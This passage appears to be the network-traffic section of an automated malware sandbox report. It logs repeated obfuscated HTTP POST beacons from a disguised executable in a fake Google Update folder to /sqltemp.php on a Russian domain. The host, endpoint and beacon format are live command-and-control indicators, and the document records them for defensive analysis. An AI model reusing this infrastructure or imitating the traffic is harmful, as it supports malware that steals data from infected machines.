                                                                                                                  Data Ascii: SP_\Q]TSXVRYVQYU[]T\U^PZZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.3/#?Y3;-T#-Z**;W)-<7\+(*&<7V.&Y.,Y-
                                                                                                                  Jan 1, 2025 16:03:15.067742109 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:15.335500956 CET | 807 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:15 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d2vdJ1CpB%2BvWyDNxnn83m84GBuxEmIdLVPiQ23jqSqCUmbVThQUMHMojqF%2Bv%2B7q9fRepkN2J8vT8n0tK4xq826fUwR4LmT%2Fv41DQSBIz05nhWsH30c8FREZQFbtTpXhmMu2o6OCx"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb3651ee874c346-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2838&min_rtt=1758&rtt_var=2820&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1402&delivery_rate=140344&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  84 | 192.168.2.6 | 62720 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:15.455957890 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:15.813499928 CET | 1124 | OUT | Data Raw: 53 54 5f 51 54 5d 51 55 58 56 52 59 56 51 59 53 5b 5b 54 5a 55 59 50 5a 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: ST_QT]QUXVRYVQYS[[TZUYPZZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-0Y"?0.7C;*=4;+);T*<[!2#<&?#,*&Y.,Y-
                                                                                                                  Jan 1, 2025 16:03:15.897746086 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:16.402477026 CET | 807 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:16 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SH39TjxRcCEXcqoejwE8W5hNigrKlJFM7yg2eVgLYKdGrAJVG2Bs1PfO6SCp4pvDOx5ApSpg%2FafP%2Bq8TdzfKIoC3oh6x8w3NPoDTW4%2B0dtQlo0s2zzncaPIwZE%2FyOuffO0ZTTptc"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb3652419bd8c84-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2917&min_rtt=2020&rtt_var=2552&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=158695&cwnd=174&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  85 | 192.168.2.6 | 62721 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:16.534173965 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:16.891745090 CET | 1124 | OUT | Data Raw: 53 57 5f 54 54 51 54 5c 58 56 52 59 56 5a 59 52 5b 53 54 5d 55 5c 50 5e 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SW_TTQT\XVRYVZYR[ST]U\P^Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S._&?)7-Y0-;E/*%7><_<'U>,#T <$/ -&Y.,Y--
                                                                                                                  Jan 1, 2025 16:03:16.987915039 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:17.252648115 CET | 812 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:17 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9SDhbThToMXEL5z59u%2F0r5zpYNS2eT9zSN38B%2B%2BqUpS7T47dsup%2Fz5bm5Is5CtoB9YqW%2BqlZUt5wrc%2BTGV5H0KqLILqwwvH%2F84Q3qUFyuWcFPj9N8xE0GZrmFlZtEwqnsGGAKIcB"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb3652aee3e0f9d-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4565&min_rtt=1587&rtt_var=6551&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=57455&cwnd=192&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  86 | 192.168.2.6 | 62722 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:17.397945881 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1112
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:17.751094103 CET | 1112 | OUT | Data Raw: 53 57 5f 55 51 58 54 52 58 56 52 59 56 59 59 57 5b 52 54 5a 55 55 50 59 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SW_UQXTRXVRYVYYW[RTZUUPYZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.&?*#?0..9%#.8**;*4!3+:$,7V.*&Y.,Y-
                                                                                                                  Jan 1, 2025 16:03:17.841615915 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:18.102741003 CET | 806 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:18 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rReysgt93NmtoRsSAWbHNGh2ixPcv1aBsFTyZeqVLpKc200%2FjrhChz7FO60fS%2Bn8zaRfqbCr%2F1dluA3QbrYkwG7TOZQo9mO2RkvGAcU%2Fc4knUEm23wzzyJEZTbR7QrgC7l3trcRN"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb365303c0142ca-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1896&min_rtt=1737&rtt_var=971&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1414&delivery_rate=484084&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  87 | 192.168.2.6 | 62725 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:18.238538980 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:18.594813108 CET | 1124 | OUT | Data Raw: 56 52 5f 5c 54 5f 51 50 58 56 52 59 56 5c 59 52 5b 5c 54 5b 55 59 50 5e 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VR_\T_QPXVRYV\YR[\T[UYP^Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-&/! <=3>?C;"7=?('*X+#!#(!D$,'R:&Y.,Y-5
                                                                                                                  Jan 1, 2025 16:03:18.682545900 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:18.939131975 CET | 803 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:18 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=etnXuYMHruqh54neYJEC3kfAbBkPDRugNE%2BMfiP5RpKumMX79Wzz97WTZTNtpjLBw4nFsKmSxumlKs9cu4kiJYrqbWkO2qil6Nnjb6Sdu41VEOpP0W%2BaPnXb1j2KJG1PfBPKpPsQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb365357ed67ca5-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2548&min_rtt=2035&rtt_var=1790&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=237630&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  88 | 192.168.2.6 | 62726 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:19.072904110 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  89 | 192.168.2.6 | 62727 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:19.352675915 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1964
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:19.704116106 CET | 1964 | OUT | Data Raw: 56 53 5a 50 51 5c 54 51 58 56 52 59 56 51 59 57 5b 5e 54 59 55 59 50 5b 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VSZPQ\TQXVRYVQYW[^TYUYP[Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.Y3/6 <1Y30;* =+)()X74"[<"28.&Y.,Y-
                                                                                                                  Jan 1, 2025 16:03:19.808497906 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:20.072254896 CET | 961 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:20 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BVbnqMt2V67pPPGcSS1lETgn%2FUXsc7UfTKVK5uoCP934%2B%2FKBSd716H87a1mLQyfA74YTMagsyaz%2B%2FrY3RrHQpea%2BieNiNqmMCDGwNLO0BEhfgeOXALJP7IcQWuuLLMOhQwJ9ti1%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb3653c8cd95e5f-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3984&min_rtt=2137&rtt_var=4496&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2266&delivery_rate=86298&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 00 1f 25 51 3e 04 3e 1d 31 22 27 05 2b 2d 28 0b 26 3d 2e 11 2b 3b 2e 17 27 3e 3c 03 2a 07 02 02 21 3f 29 13 26 2b 24 5f 34 3d 05 11 30 24 2b 59 05 1c 20 08 36 2c 2b 02 3e 3d 33 59 26 06 2d 5c 33 3e 38 16 3c 3b 28 1e 20 2b 24 07 33 04 3c 58 3e 14 20 56 24 2c 37 5f 2d 59 2d 57 33 2a 2c 54 00 11 26 13 25 31 15 07 22 27 2c 11 22 31 26 07 26 0a 0c 57 32 3c 09 52 21 29 22 5d 32 0b 27 59 35 0a 3e 1c 25 02 25 13 20 03 2f 50 3e 04 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98%Q>>1"'+-(&=.+;.'><*!?)&+$_4=0$+Y 6,+>=3Y&-\3>8<;( +$3<X> V$,7_-Y-W3*,T&%1"',"1&&W2<R!)"]2'Y5>%% /P>%S -H?WS0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  90 | 192.168.2.6 | 62728 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:19.479906082 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1120
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:19.829138994 CET | 1120 | OUT | Data Raw: 53 50 5f 5d 54 5f 51 57 58 56 52 59 56 59 59 54 5b 5e 54 5a 55 5c 50 5f 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SP_]T_QWXVRYVYYT[^TZU\P_Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-09#?:$=+@,*&#-0_?7S*-$#7X?%B% -&Y.,Y--
                                                                                                                  Jan 1, 2025 16:03:19.922841072 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:20.176903963 CET | 807 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:20 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NnYmznSFIClix7rtjJ%2B664S9r%2BKmKOX%2Fv2NstQOJTXUym4o%2BPFZkXrN8b6Lhpd%2Bq51Wn5BAX58IDxXay8dh%2B5eS2dEWbNobcD4i%2Bty9JjbeAc163QY8dqSH2insHYDHf5Aig9VEZ"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb3653d3e7a17ad-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4547&min_rtt=1471&rtt_var=6705&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1422&delivery_rate=55973&cwnd=170&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a
                                                                                                                  Data Ascii: 42W\X
                                                                                                                  Jan 1, 2025 16:03:20.263592958 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  91 | 192.168.2.6 | 62729 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:20.394752026 CET | 278 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 16:03:20.751038074 CET | 1124 | OUT | Data Raw: 56 52 5f 56 51 58 51 55 58 56 52 59 56 5e 59 50 5b 5d 54 5c 55 5b 50 59 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VR_VQXQUXVRYV^YP[]T\U[PYZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.X&<5Y#<2'-7D;)!W7<+9T>4 (&&/,::&Y.,Y-
                                                                                                                  Jan 1, 2025 16:03:20.864494085 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:21.036792040 CET | 798 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:20 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FmUGdVqESMjigHujvWBqvxioynn8DLgsd4sug2x1zQcKqSiF9Yak575ngbNRONumsvFS4lc7Xo4y51Ooa4rKzjW1b1ykmwCtPCotPZFcXL0hcKTKElKXRKYNWHQ2BQJUjRLcY5mQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb365431fabc3f5-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4288&min_rtt=1490&rtt_var=6155&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1402&delivery_rate=61149&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  92 | 192.168.2.6 | 62731 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:03:21.169689894 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:21.516659975 CET    1124    OUT    Data Raw: 56 54 5f 50 54 5b 51 51 58 56 52 59 56 5b 59 57 5b 5b 54 58 55 59 50 5c 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VT_PT[QQXVRYV[YW[[TXUYP\Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.^$: <-\$>#8- -8(;*$Z!2<(&1?;-:&Y.,Y-)
                                                                                                                  Jan 1, 2025 16:03:21.609236002 CET    25    IN    HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:21.784347057 CET    807    IN    HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:21 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
